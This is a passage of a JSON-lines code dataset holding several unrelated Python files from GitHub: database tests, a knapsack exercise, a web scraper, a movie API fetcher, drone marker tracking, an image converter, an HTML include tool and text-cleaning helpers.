D]\n","repo_name":"wsnedy/pytorch-retinanet","sub_path":"datasets/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"73368717577","text":"import pytest\nimport sqlite3\n\n\ndef test_get_all_phones(phones_repo):\n db = phones_repo\n all_phones = db.get_all()\n assert isinstance(all_phones, list), \"Incorrect type of data, should be list\"\n for phone in all_phones:\n print(phone)\n\n\ndef test_get_phone_by_brand(phones_repo):\n db = phones_repo\n brand_phones = db.get_phone_by_brand(\"Samsung\")\n assert isinstance(brand_phones, list), \"Incorrect type of data, should be list\"\n for phone in brand_phones:\n print(phone)\n\n\ndef test_add_phone(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n phone = db.get_one_by_id()\n assert isinstance(phone, tuple), \"Incorrect type of phone data, should be tuple\"\n print(phone)\n\n\ndef test_update_full_phone(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n new_phone = (\"V20\", \"LG\", \"Snapdragon 820\", 2018, 750.0)\n db.update_full_phone(*new_phone)\n upd_phone = list(db.get_one_by_id())\n assert upd_phone[1:] == [\"V20\", \"LG\", \"Snapdragon 820\", 2018, 750.0], \"The changes were not saved\"\n print(upd_phone)\n\n\ndef test_update_phone_model(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n db.partial_phone_update(model=\"Galaxy S22\")\n upd_phone = list(db.get_one_by_id())\n assert upd_phone[1] == \"Galaxy S22\", \"Incorrect phone model\"\n print(upd_phone)\n\n\ndef test_delete_phone(phones_repo, fake_phone):\n db = phones_repo\n first_max_id = db.get_max_phone_id()\n db.insert_one(**fake_phone)\n db.delete_phone_by_id()\n second_max_id = db.get_max_phone_id()\n assert first_max_id == second_max_id, \"Incorrect max index or item was not deleted\"\n\n\ndef test_get_phone_by_invalid_brand_fails(phones_repo):\n db = phones_repo\n inv_brand = \"Hello\"\n brand_phones = db.get_phone_by_brand(inv_brand)\n assert brand_phones is None, f\"Value of brand_phones should be None, because there is no brand {inv_brand}\"\n\n\ndef test_add_phone_without_model_fails(phones_repo):\n db = phones_repo\n with pytest.raises(sqlite3.IntegrityError, match=\"NOT NULL constraint failed: PHONES.MODEL\"):\n db.insert_one(model=None, brand=\"Huawei\", processor=\"Kirin\", year=2020, price=500.0)\n\n\ndef test_delete_phone_by_wrong_id_fails(phones_repo):\n db = phones_repo\n first_max_id = db.get_max_phone_id()\n inv_id = \"word\"\n db.delete_phone_by_id(inv_id)\n second_max_id = db.get_max_phone_id()\n assert first_max_id == second_max_id, f\"Item was deleted by incorrect id {inv_id}, but should`t!\"\n\n\n\n","repo_name":"daryay2001/Pytest_samples","sub_path":"tests/Lesson_23/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14336555198","text":"## Question 1\r\n\r\nwith open('3 - 4 - Knapsack 1.txt') as f:\r\n\ttemp = f.readline().split()\r\n\tknapsack_size = int(temp[0]) - 1\r\n\tnum_of_items = int(temp[1]) - 1\r\n\tvalues = []\r\n\tweights = []\r\n\tfor line in f:\r\n\t\ttemp = line.split()\r\n\t\tvalues.append(int(temp[0]))\r\n\t\tweights.append(int(temp[1]))\r\n\r\nA = [[0 for x in range(knapsack_size + 1)] for y in range(num_of_items + 1)]\r\n\r\nfor i in range(1, num_of_items + 1):\r\n\tfor x in range(1, knapsack_size + 1):\r\n\t\tif weights[i] >= x:\r\n\t\t\tA[i][x] = A[i-1][x]\r\n\t\telse:\r\n\t\t\tA[i][x] = max(A[i-1][x], A[i-1][x-weights[i]] + values[i])\r\n\r\nprint(A[-1][-1])\r\n\r\n# Answer: 2493893\r\n\r\n## Question 2\r\n\r\nimport sys\r\n\r\ndef knapsack(i, x):\r\n\tif i == -1 or x == 0:\r\n\t\treturn 0\r\n\tif weights[i] >= x:\r\n\t\tif (i-1, x) not in cache:\r\n\t\t\tcache[(i-1, x)] = knapsack(i-1, x)\r\n\t\treturn cache[(i-1, x)]\r\n\telse:\r\n\t\tif (i-1, x) not in cache:\r\n\t\t\tcache[(i-1, x)] = knapsack(i-1, x)\r\n\t\tsolution_without_ith_item = cache[(i-1, x)]\r\n\t\tif (i-1, x-weights[i]) not in cache:\r\n\t\t\tcache[(i-1, x-weights[i])] = knapsack(i-1, x-weights[i])\r\n\t\tsolution_with_ith_item = cache[(i-1, x-weights[i])] + values[i]\r\n\t\treturn max(solution_with_ith_item, solution_without_ith_item)\r\n\r\n\r\nwith open('3 - 4 - Knapsack 2.txt') as f:\r\n\ttemp = f.readline().split()\r\n\tknapsack_size = int(temp[0]) - 1\r\n\tnum_of_items = int(temp[1]) - 1\r\n\tvalues = []\r\n\tweights = []\r\n\tfor line in f:\r\n\t\ttemp = line.split()\r\n\t\tvalues.append(int(temp[0]))\r\n\t\tweights.append(int(temp[1]))\r\n\r\ncache = {}\r\n\r\nsys.setrecursionlimit(2500)\r\n\r\nprint(knapsack(num_of_items, knapsack_size))\r\n\r\n# Answer: 4243395","repo_name":"menduhkesici/Algorithms_by_Stanford","sub_path":"3 - 4 - Knapsack.py","file_name":"3 - 4 - Knapsack.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5341173606","text":"#!/usr/bin/env python\n\nimport os\nimport re\n\nDIR = './ACQ400_FPGA'\n\nNEWFILES = {}\nOLDFILES = {}\n\nfor file in os.listdir(DIR):\n if file.endswith(\".bit.gz\"):\n fields = re.split('[_\\-\\.]', file)\n# print(fields)\n if '64B' in fields:\n# print(f'{file} 64B found')\n NEWFILES[file] = fields\n elif '32B' in fields:\n# print(f'{file} 32B found')\n NEWFILES[file] = fields\n else:\n OLDFILES[file] = fields\n \n\n\n#print(FILES)\n#print(NOAXI)\n\nnomatch = 0\nmatches = 0\n\nfor oldfile, oldfields in OLDFILES.items():\n if oldfields[0] == 'ACQ1001':\n exact_match = 4\n elif oldfields[0] == 'ACQ2106':\n exact_match = 8\n else:\n exact_match = 3\n for newfile, newfields in NEWFILES.items():\n\n try:\n for fn, of in enumerate(oldfields):\n if fn < exact_match and of != newfields[fn]:\n raise Exception(\"no exact match\")\n elif not of in newfields:\n raise Exception(\"no match\")\n print(f\"{oldfile}\")\n print(f\"XXX {oldfile} is replaced by {newfile}\")\n matches += 1\n break\n except:\n nomatch += 1\n\n\nprint(f\"Total nomatch {nomatch} Total match {matches} out of {len(OLDFILES)}\")\n\n\n\n\n\n\n\n\n\n","repo_name":"D-TACQ/ACQ400RELEASE","sub_path":"scripts/blacklist_redundant_fpgas.py","file_name":"blacklist_redundant_fpgas.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17239842537","text":"#!/usr/bin/env python3\n#\n# ScrapeCountries.py\n#\n# Scrapes countries from http://www.nationsonline.org\n#\n# Note: Because the website fluctuates, this is not up to date and\n# tests won't all pass. However, I'm leaving this for the HTMLParser\n# example rather than parsing accuracy.\n#\n# Brandon Amos\n# 2013.04.26\n\nimport argparse # Argument parsing.\nimport html.parser # HTML parsing.\nimport urllib.parse # URL retrieval.\nimport urllib.request # URL retrieval.\nimport re # Regular expressions.\nimport pickle # Pickling.\n\n# Given a URL, this retrieves the content with a utf8 encoding\n# and uses the CountryParser to extract the country names from\n# the tables.\nclass URLParser():\n user_agent = (\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) \"\n \"AppleWebKit/525.13 (KHTML, like Gecko)\"\n \"Chrome/0.2.149.29 Safari/525.13\")\n\n def __init__(self, url, numCols, extractionMap, exceptions):\n # Request the html.\n request = urllib.request.Request(url)\n request.add_header(\"User-Agent\",self.user_agent)\n try:\n response = urllib.request.urlopen(request)\n except:\n print(\"Error: Invalid URL. Exiting.\")\n exit()\n htmlContent = response.read().decode(\"utf8\")\n\n # Some files have
    in the middle of a tag,\n # and cause the parser to misinterpret the data.\n htmlContent = htmlContent.replace(\"
    \", \"\")\n\n # Parse the html.\n parser = CountryParser(numCols, extractionMap, exceptions, strict=False)\n htmlContent = parser.unescape(htmlContent) # Unescape HTML entities.\n parser.feed(htmlContent)\n parser.close()\n self.__countryData = parser.countryData\n\n @property\n def countryData(self):\n return self.__countryData\n\n# CountryParser keeps track of the HTML tags and appends country\n# names to a list.\nclass CountryParser(html.parser.HTMLParser):\n\n # Initialize the class variables.\n def __init__(self, numCols, extractionMap, exceptions, strict=False):\n super().__init__(strict=strict)\n\n self.__numCols = numCols\n self.__extractionMap = extractionMap\n self.__exceptions = exceptions\n\n # Maintain our position within tags.\n self.__in_tr = False\n self.__in_td = False\n\n # Within rows specifically, keep track of our index.\n # This helps because we know the country name always\n # occurs in the 0th position, and if we've exceeded\n # `numCols` positions, then the current row does not have\n # the data we want.\n self.__td_position = 0\n\n # Keep a record of possible data.\n self.__possible_data = []\n\n # The country names, successfully parsed.\n self.__countryData = []\n\n def handle_starttag(self, tag, attrs):\n if tag == \"tr\":\n self.__in_tr = True\n\n # Reset the possible data.\n self.__td_position = 0\n self.__possible_data = []\n for i in range(self.__numCols):\n self.__possible_data.append(\"\")\n elif tag == \"td\":\n self.__in_td = True\n\n def handle_endtag(self, tag):\n if tag == \"tr\":\n self.__in_tr = False\n\n if self.__td_position == self.__numCols:\n # Extract the columns and clean them up.\n extractedData = [self.__possible_data[i] for i in self.__extractionMap]\n for i in range(len(extractedData)):\n if extractedData[i]:\n extractedData[i] = extractedData[i].replace('\\n', ' ').strip()\n\n # Detect data with empty columns, unless it's an exception,\n # in which case we don't do this check.\n isIntersection = bool(set(extractedData) & set(self.__exceptions))\n if not isIntersection:\n for i in range(len(extractedData)):\n if not extractedData[i] or len(extractedData[i]) == 0:\n #print(extractedData)\n return\n\n self.__countryData.append(extractedData)\n elif tag == \"td\":\n self.__in_td = False\n self.__td_position += 1\n\n # If our criteria match, we know our position in the table.\n # Keep track of the data.\n def handle_data(self, data):\n if self.__in_tr:\n if self.__in_td:\n if self.__td_position < self.__numCols:\n self.__possible_data[self.__td_position] += data\n\n @property\n def countryData(self):\n return self.__countryData\n\n# Define usage when running this from the command line.\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Scrape countries from http://www.nationsonline.org.')\n parser.add_argument('url', type=str, help='The URL to scrape.')\n parser.add_argument('output', type=str, help='The output file.')\n parser.add_argument('-p', '--pickle', dest='p', action='store_true',\n help='Generate a pickle.')\n args = parser.parse_args()\n\n genPickle = args.p\n url = args.url\n outputFile = args.output\n\n # Default values.\n numPops = 0 # The number of irrelavant data values at the top to ignore.\n exceptions = [] # Legitamet country rows marked as erroneous.\n numCols = 3 # The number of columns.\n extractionMap = (0, 1, 2) # The subset of columns to use as output.\n\n # Consider the different cases for each URL.\n baseUrl = \".*nationsonline.org/oneworld/\"\n if re.match(baseUrl + \"countrynames_arabic.htm\", url):\n print(\"Parsing country names in Arabic.\")\n numCols = 5\n extractionMap = (1, 2, 4)\n exceptions = ['Cayman Islands', 'Falkland Islands', 'Montenegro',\n 'Saint Kitts and Nevis', 'Saint Vincent and the Grenadines',\n 'Tokelau', 'Western Sahara']\n elif re.match(baseUrl + \"country_names_in_chinese.htm\", url):\n print(\"Parsing country names in Chinese.\")\n numCols = 4\n extractionMap = (0, 1, 2, 3)\n exceptions = ['Tuvalu']\n numPops = 1\n elif re.match(baseUrl + \"country_code_list.htm\", url):\n print(\"Parsing country code list.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n elif re.match(baseUrl + \"countries_of_the_world.htm\", url):\n print(\"Parsing countries of the world.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines', 'Virgin Islands (British)']\n elif re.match(baseUrl + \"countrynames_german.htm\", url):\n print(\"Parsing country names in German.\")\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'South Georgia and South Sandwich Islands',\n 'Virgin Islands (British)',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_italian.htm\", url):\n print(\"Parsing country names in Italian.\")\n exceptions = ['French Southern Territories',\n 'Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'South Georgia and South Sandwich Islands',\n 'U.S. Minor Outlying Islands',\n 'Virgin Islands (British)',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_russian.htm\", url):\n print(\"Parsing country names in Russian.\")\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_spanish.htm\", url):\n print(\"Parsing country names in Spanish.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'Virgin Islands (British)']\n else:\n print(\"Unrecognized url. Using default (and likely incorrect) values.\")\n\n print(\"Using {0} columns overall and extracting columns {1}.\".format(\n numCols, extractionMap))\n\n # Parse the HTML and pop the irrelevant values from the results.\n parsedURL = URLParser(url, numCols, extractionMap, exceptions)\n countryData = parsedURL.countryData\n for i in range(numPops):\n countryData.pop(0)\n\n # Write the data to disk.\n if genPickle:\n f = open(args.output, 'wb')\n pickle.dump(countryData, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n else:\n f = open(args.output, 'w', encoding=\"utf8\")\n for country in countryData:\n f.write('\\t'.join(map(str,country)))\n f.write('\\n')\n f.close()\n print(\"Finished extracting. Data written to '{0}'\".format(outputFile))\n","repo_name":"canpolat/python-scripts","sub_path":"python3/ScrapeCountries.py","file_name":"ScrapeCountries.py","file_ext":"py","file_size_in_byte":7972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"28201883059","text":"# let's import all the packages we need\r\n# requests: package used to query API and get the result back in Python\r\n# json: package used to read and convert JSON format\r\n# csv: package used to read and write csv\r\nfrom typing_extensions import runtime\r\nimport requests, json, csv, os\r\n\r\n# document all the parameters as variables\r\nAPI_key = \"\"\r\n# write a function to compose the query using the parameters provided\r\ndef get_data(API_key, Movie_ID):\r\n query = (\r\n \"https://api.themoviedb.org/3/movie/\"\r\n + str(Movie_ID)\r\n + \"?api_key=\"\r\n + API_key\r\n + \"&language=en-US\"\r\n )\r\n response = requests.get(query)\r\n if response.status_code == 200:\r\n # status code ==200 indicates the API query was successful\r\n array = response.json()\r\n text = json.dumps(array)\r\n return text\r\n else:\r\n return \"error\"\r\n\r\n\r\ndef write_file(filename, text, movie):\r\n dataset = json.loads(text)\r\n csvFile = open(filename, \"a\", encoding=\"utf-8\", errors=\"ignore\")\r\n csvwriter = csv.writer(csvFile)\r\n # unpack the result to access the \"collection name\" element\r\n try:\r\n collection_name = dataset[\"belongs_to_collection\"][\"name\"]\r\n except:\r\n # for movies that don't belong to a collection, assign null\r\n collection_name = None\r\n try:\r\n backdrop_path = dataset[\"backdrop_path\"]\r\n except:\r\n backdrop_path = None\r\n try:\r\n poster_path = dataset[\"poster_path\"]\r\n except:\r\n backdrop_path = None\r\n try:\r\n genre = dataset[\"genres\"][0][\"name\"]\r\n except:\r\n genre = None\r\n try:\r\n overview = dataset[\"overview\"]\r\n except:\r\n overview = None\r\n try:\r\n release = dataset[\"release_date\"]\r\n except:\r\n release = None\r\n try:\r\n Runtime = dataset[\"runtime\"]\r\n except:\r\n Runtime = None\r\n result = [\r\n movie,\r\n dataset[\"original_title\"],\r\n overview,\r\n genre,\r\n release,\r\n collection_name,\r\n backdrop_path,\r\n poster_path,\r\n Runtime,\r\n ]\r\n # write data\r\n csvwriter.writerow(result)\r\n print(result)\r\n csvFile.close()\r\n\r\n\r\n# write header to the file\r\ncsvFile = open(\"movie_collection_data.csv\", \"a\", encoding=\"utf-8\", errors=\"ignore\")\r\ncsvwriter = csv.writer(csvFile)\r\ncsvwriter.writerow(\r\n [\r\n \"ID\",\r\n \"Movie_name\",\r\n \"Overview\",\r\n \"Genres\",\r\n \"Release Date\",\r\n \"Collection_name\",\r\n \"backdrop_path\",\r\n \"poster_path\",\r\n \"Runtime\",\r\n ]\r\n)\r\ncsvFile.close()\r\nfor movie in range(10000, 10600):\r\n text = get_data(API_key, movie)\r\n # make sure your process breaks when the pull was not successful\r\n # it's easier to debug this way\r\n if text == \"error\":\r\n continue\r\n write_file(\"movie_collection_data.csv\", text, movie)\r\n","repo_name":"Taru-garg/theTVguide","sub_path":"utility/Data/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18136476034","text":"import numpy as np\nimport cv2\nimport cv2.aruco as aruco\nimport sys, time, math\nfrom StateMachine.DroneObject import DroneObject\n\n\n\n\n#Find Distance\n#Param: coordinates: np.array of 4 coordinates of the detected marker, from top left corner going clockwise\n #knownWidth: predefined width of teh marker\n #focalLength: predefined focalLength of camera (different for each camera)\n#return: distance (int)\n\ndef DistancetoCamera(coordinates, knownWidth, focalLength):\n pixel_width = abs(coordinates[0][0][0]-coordinates[0][1][0])**2 + abs(coordinates[0][0][1]-coordinates[0][1][1])**2\n pixel_width = pixel_width**0.5\n return (knownWidth*focalLength)/pixel_width\n\n#Determine Orientation\n#Param: TopPoint: Tuple for top point\n #BottomPoint: Tuple for bottom point\n#return: number between 0 to 360\ndef orientation (TopPoint, BottomPoint):\n dy = -(TopPoint[1] - BottomPoint[1])\n dx = (TopPoint[0] - BottomPoint[0])\n if (dx ==0): #special case, don't want to divide by 0!\n if (dy>0):\n return 90\n else:\n return 270\n\n\n angle = int(math.degrees(math.atan(dy/dx)))\n\n if (dy>0):\n if (dx < 0):\n angle = 180 + angle\n else:\n return angle\n else:\n if (dx < 0):\n angle += 180\n else:\n angle += 360\n\n\n return angle\n\n#Determine command based on orientation of the marker\n#Param: orientation, a number between 360\n#return: null\n\ndef StateTransition(orientation):\n if (orientation > 360 or orientation < 0):\n print(\"invalid orientation, orientation should be between 0 adn 360\")\n return\n\n if (orientation < 100 and orientation > 80):\n drone.on_event(\"take_off\")\n\n\n elif (orientation < 280 and orientation > 260):\n drone.on_event(\"land\")\n return\n\n#Draw HUD information on the screen for human operator\n#Param: frame: frame to write on\n #Distance: distance to camera\n #coordinates: 4 corners of the marker\n #angle: orientation of marker\n #center: center of marker\n #ids: ids of marker\n #corners: a list of coordinates for aruco.drawDectedMarkers\n#return: nothing\n\n\ndef Draw (frame, Distance, coordinates, angle, Center, ids, corners):\n\n cv2.putText(frame, ('Distance %d' % Distance), (10, 95), cv2.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255),\n 2, cv2.LINE_AA)\n cv2.circle(frame, Center, 2, (255, 0, 0), thickness=1)\n cv2.circle(frame, (int(coordinates[0][0][0]), int(coordinates[0][0][1])), 4, (255, 0, 0), thickness=-1)\n cv2.circle(frame, (int(coordinates[0][1][0]), int(coordinates[0][1][1])), 4, (255, 0, 0), thickness=-1)\n cv2.putText(frame, ('Orientation %d' % angle), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0),\n 2,\n cv2.LINE_AA)\n cv2.putText(frame, ('Center %d,%d' % Center), (10, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2,\n cv2.LINE_AA)\n cv2.putText(frame, ('id %s' % ids), (10, 35), cv2.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255), 2,\n cv2.LINE_AA)\n aruco.drawDetectedMarkers(frame, corners, borderColor=(255, 255, 255))\n return\n\n#Determines the amount of tilt of the marker\n#Param: state: state of the drone\n #frame: frame to draw on\n #coordinates: coordinates of the detected marker\n #orientation: orientation of the marker\n#Returns: ratio of the right side length over the left side length, 0 if nothing is detected\ndef Tilt(state, frame, coordinates, orientation):\n Ratio = 0\n if (str(state) != \"TrackState\"):\n return Ratio\n if (orientation > 140 and orientation < 220):\n LeftSide = ((coordinates[0][1][0] - coordinates[0][0][0]) ** 2 + (\n coordinates[0][1][1] - coordinates[0][0][1]) ** 2) ** 0.5\n RightSide = ((coordinates[0][2][0] - coordinates[0][3][0]) ** 2 + (\n coordinates[0][2][1] - coordinates[0][3][1]) ** 2) ** 0.5\n Ratio = (1.0* RightSide / LeftSide)\n cv2.putText(frame, (\"Ratio is %s \" % Ratio), (400, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2, cv2.LINE_AA)\n\n elif ((orientation > 310 and orientation <= 360) or (orientation >= 0 and orientation <= 30)):\n RightSide = ((coordinates[0][1][0] - coordinates[0][0][0]) ** 2 + (\n coordinates[0][1][1] - coordinates[0][0][1]) ** 2) ** 0.5\n LeftSide = ((coordinates[0][2][0] - coordinates[0][3][0]) ** 2 + (\n coordinates[0][2][1] - coordinates[0][3][1]) ** 2) ** 0.5\n Ratio = (1.0 * RightSide / LeftSide)\n cv2.putText(frame, (\"Ratio is %s\" % Ratio), (400, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2, cv2.LINE_AA)\n return Ratio\n\nif __name__ == \"__main__\":\n #Create drone object and set up communication\n drone = DroneObject()\n drone.setup()\n frame_read = drone.tello.get_frame_read()\n time.sleep(5)\n\n angle = 0\n KNOWN_WIDTH = 9.7\n FOCAL_LENGTH = 630\n tilt = 0\n\n while (True):\n #retrieve frame and convert to black and white\n frame = frame_read.frame\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #Detect 6X6 marker\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\n parameters = aruco.DetectorParameters_create()\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\n\n #if markers are detected\n if (len(corners)!=0):\n aruco.drawDetectedMarkers(frame, corners, ids, (0,0,0))\n\n #determine center of the marker\n coordinates = tuple(corners[0])\n centerY = int((coordinates[0][0][1] + coordinates[0][2][1]) / 2)\n centerX = int((coordinates[0][0][0] + coordinates[0][2][0]) / 2)\n Center = (centerX,centerY)\n\n #determine angle, distance, state command, and pass in drone command\n angle = orientation((int(coordinates[0][3][0]),int(coordinates[0][3][1])),(int(coordinates[0][0][0]), int(coordinates[0][0][1])) )\n Distance = DistancetoCamera(coordinates, KNOWN_WIDTH, FOCAL_LENGTH)\n StateTransition(angle)\n tilt = Tilt(drone.state, frame, coordinates, angle)\n drone.set_parameter(Center[0], Center[1], Distance, tilt)\n\n print (coordinates)\n #draw HUD for BGR and gray screen\n Draw(gray, Distance, coordinates, angle, Center, ids, corners )\n Draw(frame, Distance, coordinates, angle, Center, ids, corners)\n #send command to the drone\n drone.action()\n\n #print state info on the drone\n cv2.putText(frame, (\"Drone state: %s\" % drone.state), (600, 15), cv2.FONT_HERSHEY_SIMPLEX, .5,\n (255, 255, 255),\n 2, cv2.LINE_AA)\n cv2.putText(gray, (\"Drone state: %s\" % drone.state), (600, 15), cv2.FONT_HERSHEY_SIMPLEX, .5,\n (255, 255, 255),\n 2, cv2.LINE_AA)\n\n #show screen\n cv2.imshow('frame', frame)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n time.sleep(1/30)\n # When everything done, release the capture\n\n cv2.destroyAllWindows()\n sys.exit()\n","repo_name":"KhazanahAmericasInc/TrackingProject","sub_path":"TrackTelloAruco.py","file_name":"TrackTelloAruco.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"23298785159","text":"import os\n\nimport requests\nfrom PIL import Image\n\n\nclass Converter:\n\n def __init__(self, type_way, path_link, one_many, re_value, conv_from, conv_to):\n self.type_way = type_way\n self.path_link = path_link\n self.one_many = one_many\n self.re_value = re_value\n self.conv_from = conv_from\n self.conv_to = conv_to\n\n def convert(self):\n if self.type_way == 'u':\n self.url_image()\n if self.type_way == 't':\n if self.one_many == 'y':\n self.convert_one()\n else:\n self.convert_many()\n\n def resize_image(self, img):\n height, width = img.size\n height, width = int(height * self.re_value / 100), int(width * self.re_value / 100)\n img = img.resize((height, width))\n return img\n\n def convert_one(self):\n img = Image.open(self.path_link)\n new_dir = self.path_link[:self.path_link.rfind('.')]\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + \".\" + self.conv_to)\n print(\"Изображение сохранено!\")\n\n def convert_many(self):\n images_list = list(filter(lambda x: x.endswith(self.conv_from), os.listdir(self.path_link)))\n new_dir = self.path_link + \"/converted/\"\n if not os.path.exists(new_dir):\n os.mkdir(new_dir)\n for image in images_list:\n img = Image.open(self.path_link + \"/\" + image)\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + image[:image.find('.')] + \".\" + self.conv_to)\n print(\"Изображения сохранены в папке converted!\")\n\n def url_image(self):\n re = requests.get(self.path_link, stream=True).raw\n img = Image.open(re)\n print(\"Введите путь к папке для сохранения:\")\n new_dir = \"\"\n while 1:\n new_dir = input()\n if os.path.exists(new_dir):\n if os.path.isdir(new_dir):\n break\n else:\n print(\"Укажите путь только до папки:\")\n else:\n print(\"Путь не найден! Введите существующий путь:\")\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + \"/new.\" + self.conv_to)\n print(f\"Изображение сохранено в выбранную папку c именем new.{self.conv_to}!\")\n","repo_name":"zina-frid/BMP-to-PNG","sub_path":"converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74739114377","text":"import os, glob, re, warnings\nimport argparse\n\nfrom html_ssi.classes import PathType\n\n# Parser for CLI params\nparser = argparse.ArgumentParser(description=\"Script to add server side include functionality to HTML files.\")\nparser.add_argument(\"-s\", \"--source\", help=\"source directory (must container folder called '_includes' for the files to be included)\", required=True, type=PathType(exists=True, type='dir'))\nparser.add_argument(\"-d\", \"--destination\", help=\"destination directory\", required=True, type=PathType(exists=True, type='dir'))\nargs = parser.parse_args()\n\ninclude_str_exp = r'\\'\ninclude_file_exp = r'(?<=\\)'\ninclude_dir = '_includes/'\n\n# for each file, find all include statments\n# iterate through include statements and replace w/ contents from corresponding file, if it exists, otherwise skip & log error\n\nfor sourcefile in glob.iglob(vars(args)[\"source\"] + '**/*.html', recursive=True):\n\tif include_dir in sourcefile:\n\t\tcontinue\n\twith open(sourcefile) as file:\n\t\ts = file.read()\n\t\tincludes = re.findall(include_str_exp, s)\n\t\tfor include in includes:\n\t\t\ti = re.findall(include_file_exp, include)[0]\n\t\t\tprint(\">>> \" + sourcefile + \" < \" + \"_includes/\" + i)\n\t\t\ttry:\n\t\t\t\tf = open(vars(args)[\"source\"] + include_dir + i).read()\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\">>>\" + sourcefile + \" is attempting to include file that cannot be opened\\n\", e)\n\t\t\ts = s.replace(include, f)\n\twith open(vars(args)[\"destination\"] + os.path.basename(sourcefile), \"w\") as file:\n\t\tfile.write(s)","repo_name":"kbitz/html-ssi","sub_path":"html_ssi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13772688092","text":"\n\n\nimport string\n\nfrom nltk.corpus import stopwords\nimport json\nimport glob\nimport re\nimport spacy\nimport argparse\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StringType\nfrom pyspark.sql.functions import col, unix_timestamp, concat, lit, udf\nfrom functools import partial\n\n\n\n\ndef remove_stops(text,stops):\n \n pattern = r'\\b\\d{1,2}/\\d{1,2}/\\d{4}\\b'\n text= re.sub(pattern, '', text)\n text=text.replace(\"\\n\",\" \")\n text=text.replace(\"-\",\" \")\n text=text.strip()\n text=text.lower()\n words=text.split()\n \n \n \n #rimozione stopwords\n final=[]\n for word in words:\n if word not in stops:\n \n final.append(word)\n final=\" \".join(final)\n\n #punti\n final=final.translate(str.maketrans(\"\",\"\",string.punctuation))\n #rimozione numeri\n final=\"\".join([i for i in final if not i.isdigit()])\n\n #eliminazione doppi \" \"\n while \" \" in final:\n final=final.replace(\" \",\" \")\n \n return (final)\n\n\n\n \ndef lemming_text( text):\n # Load the Italian language model\n nlp = spacy.load(\"it_core_news_sm\")\n # Process the text with spaCy\n doc = nlp(text)\n # Lemmatize each token in the text\n lemmas = [token.lemma_ for token in doc]\n # Print the lemmas\n text=\" \".join(lemmas)\n return text\n \n \ndef find_none_spaced_words(text):\n \n \n \n text_with_space = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", text)\n\n \n return text_with_space\n\ndef delete_double_spaces(text):\n text_without_double_spaces = re.sub(r\"\\s+\", \" \", text)\n return text_without_double_spaces\n\ndef clean_text_from_emoj(tweet):\n\n # Remove emojis\n tweet = re.sub(r\"\\s+\", \" \", tweet.encode(\"ascii\", \"ignore\").decode(\"utf-8\"))\n\n # Remove emoticons\n emoticons = re.findall(r\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", tweet)\n tweet = re.sub(r\"\\s+\", \" \", tweet)\n for emoticon in emoticons:\n tweet = tweet.replace(emoticon, \"\")\n\n # Remove URLs\n tweet = re.sub(r\"http\\S+|www\\S+|https\\S+\", \"\", tweet, flags=re.MULTILINE)\n\n return tweet.strip() \n\n# Define a custom function to delete URLs from text\ndef delete_urls(text):\n url_pattern = 